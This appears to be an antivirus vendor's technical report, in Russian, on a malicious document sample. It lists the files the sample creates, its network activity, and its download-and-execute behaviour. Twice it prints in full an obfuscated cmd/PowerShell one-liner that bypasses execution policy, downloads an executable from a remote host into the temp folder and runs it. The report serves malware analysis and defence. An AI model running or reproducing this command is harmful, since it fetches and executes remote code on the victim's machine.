Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://d14t.top/brig/ как $uytcccs
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c P^owerSh^ell -ExecutionPolicy ByPass -NoProfile -command $uytcccs=$env:temp+'\3bs2.exe';(Ne^w-Objec^t Net.We^bCli^e^nt).DownloadFile('http://d14t.top/brig/',$uytcccs);Start-Process $uytcccs
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\1213906.cvr
Сетевая активность
UDP
- DNS ASK d1##.top
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c P^owerSh^ell -ExecutionPolicy ByPass -NoProfile -command $uytcccs=$env:temp+'\3bs2.exe';(Ne^w-Objec^t Net.We^bCli^e^nt).DownloadFile('http://d14t.top/brig/',$uytcccs);Start-Process $uytcccs' (со скрытым окном)
